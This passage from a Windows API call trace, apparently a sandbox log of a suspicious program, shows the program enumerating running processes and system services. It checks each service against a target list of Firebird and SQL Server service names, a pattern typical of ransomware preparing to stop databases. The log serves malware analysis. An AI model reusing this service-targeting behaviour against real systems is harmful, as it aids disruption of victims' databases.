szExeFile="CompatTelRunner.exe")) returned 1 [0211.122] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0211.122] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.123] lstrlenW (lpString="conhost.exe") returned 11 [0211.123] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0211.124] lstrlenW (lpString="cmd.exe") returned 7 [0211.124] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.125] lstrlenW (lpString="conhost.exe") returned 11 [0211.126] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0211.127] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0211.127] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 0 [0211.128] CloseHandle (hObject=0x3dc) returned 1 [0211.128] Sleep (dwMilliseconds=0x1f4) [0211.635] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236baf8 [0211.636] EnumServicesStatusExW (in: hSCManager=0x236baf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0211.636] GetLastError () returned 0xea [0211.636] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x40f9e88 [0211.636] EnumServicesStatusExW (in: hSCManager=0x236baf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x40f9e88, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x40f9e88, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0211.637] CloseServiceHandle (hSCObject=0x236baf8) returned 1 [0211.638] lstrlenW (lpString="Appinfo") returned 7 [0211.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0211.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0211.638] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0211.638] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0211.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0211.638] lstrlenW (lpString="AppXSvc") returned 7 [0211.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0211.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0211.638] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0211.638] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0211.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0211.638] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0211.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0211.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0211.638] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0211.638] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0211.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0211.638] lstrlenW (lpString="Audiosrv") returned 8 [0211.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0211.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0211.638] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0211.638] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0211.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0211.638] lstrlenW (lpString="BFE") returned 3 [0211.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0211.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0211.639] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0211.639] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0211.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0211.639] lstrlenW (lpString="BITS") returned 4 [0211.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0211.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0211.639] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0211.639] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0211.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0211.639] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0211.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0211.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0211.639] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0211.639] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0211.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0211.639] lstrlenW (lpString="CDPSvc") returned 6 [0211.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0211.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0211.639] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0211.639] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0211.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0211.639] lstrlenW (lpString="ClickToRunSvc") returned 13 [0211.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0211.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0211.639] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0211.639] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0211.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0211.639] lstrlenW (lpString="ClipSVC") returned 7 [0211.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0211.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0211.639] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0211.639] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0211.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0211.640] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0211.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0211.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0211.640] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0211.640] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0211.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0211.640] lstrlenW (lpString="CryptSvc") returned 8 [0211.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0211.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0211.640] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0211.640] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0211.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0211.640] lstrlenW (lpString="DcomLaunch") returned 10 [0211.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0211.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0211.640] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0211.640] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0211.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0211.640] lstrlenW (lpString="DeviceAssociationService") returned 24 [0211.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0211.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0211.640] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0211.640] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0211.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0211.640] lstrlenW (lpString="Dhcp") returned 4 [0211.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0211.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0211.640] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0211.640] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0211.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0211.640] lstrlenW (lpString="Dnscache") returned 8 [0211.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0211.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0211.641] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0211.641] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0211.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0211.641] lstrlenW (lpString="DoSvc") returned 5 [0211.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0211.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0211.641] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0211.641] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0211.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0211.641] lstrlenW (lpString="DPS") returned 3 [0211.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0211.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0211.641] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0211.641] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0211.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0211.641] lstrlenW (lpString="DusmSvc") returned 7 [0211.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0211.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0211.641] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0211.641] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0211.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0211.641] lstrlenW (lpString="EventLog") returned 8 [0211.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0211.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0211.641] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0211.641] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0211.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0211.641] lstrlenW (lpString="EventSystem") returned 11 [0211.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0211.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0211.641] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0211.641] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0211.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0211.642] lstrlenW (lpString="FontCache") returned 9 [0211.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0211.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0211.642] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0211.642] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0211.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0211.642] lstrlenW (lpString="gpsvc") returned 5 [0211.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0211.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0211.642] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0211.642] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0211.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0211.642] lstrlenW (lpString="iphlpsvc") returned 8 [0211.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0211.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0211.642] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0211.642] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0211.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0211.642] lstrlenW (lpString="KeyIso") returned 6 [0211.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0211.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0211.642] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0211.642] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0211.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0211.642] lstrlenW (lpString="LanmanServer") returned 12 [0211.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0211.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0211.642] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0211.642] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0211.642] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0211.642] lstrlenW (lpString="LanmanWorkstation") returned 17 [0211.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0211.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0211.643] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0211.643] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0211.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0211.643] lstrlenW (lpString="lfsvc") returned 5 [0211.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0211.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0211.643] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0211.643] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0211.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0211.643] lstrlenW (lpString="LicenseManager") returned 14 [0211.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0211.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0211.643] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0211.643] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0211.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0211.643] lstrlenW (lpString="lmhosts") returned 7 [0211.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0211.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0211.643] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0211.643] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0211.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0211.643] lstrlenW (lpString="LSM") returned 3 [0211.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0211.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0211.643] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0211.643] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0211.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0211.643] lstrlenW (lpString="MpsSvc") returned 6 [0211.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0211.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0211.643] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0211.643] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0211.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0211.643] lstrlenW (lpString="NcbService") returned 10 [0211.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0211.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0211.644] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0211.644] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0211.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0211.644] lstrlenW (lpString="netprofm") returned 8 [0211.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0211.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0211.644] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0211.644] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0211.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0211.644] lstrlenW (lpString="NlaSvc") returned 6 [0211.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0211.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0211.644] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0211.644] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0211.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0211.644] lstrlenW (lpString="nsi") returned 3 [0211.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0211.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0211.644] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0211.644] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0211.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0211.644] lstrlenW (lpString="PcaSvc") returned 6 [0211.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0211.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0211.644] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0211.644] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0211.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0211.644] lstrlenW (lpString="PlugPlay") returned 8 [0211.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0211.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0211.644] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0211.644] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0211.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0211.645] lstrlenW (lpString="Power") returned 5 [0211.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0211.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0211.645] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0211.645] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0211.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0211.645] lstrlenW (lpString="ProfSvc") returned 7 [0211.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0211.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0211.645] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0211.645] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0211.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0211.645] lstrlenW (lpString="RpcEptMapper") returned 12 [0211.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0211.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0211.645] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0211.645] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0211.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0211.645] lstrlenW (lpString="RpcSs") returned 5 [0211.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0211.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0211.645] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0211.645] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0211.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0211.645] lstrlenW (lpString="SamSs") returned 5 [0211.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0211.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0211.645] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0211.645] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0211.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0211.645] lstrlenW (lpString="Schedule") returned 8 [0211.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0211.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0211.645] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0211.645] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0211.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0211.646] lstrlenW (lpString="SecurityHealthService") returned 21 [0211.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0211.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0211.646] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0211.646] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0211.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0211.646] lstrlenW (lpString="SENS") returned 4 [0211.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0211.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0211.646] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0211.646] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0211.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0211.646] lstrlenW (lpString="ShellHWDetection") returned 16 [0211.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0211.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0211.646] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0211.646] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0211.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0211.646] lstrlenW (lpString="Spooler") returned 7 [0211.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0211.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0211.646] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0211.646] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0211.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0211.646] lstrlenW (lpString="sppsvc") returned 6 [0211.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0211.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0211.646] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0211.646] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0211.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0211.646] lstrlenW (lpString="SSDPSRV") returned 7 [0211.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0211.646] lstrcmpiW 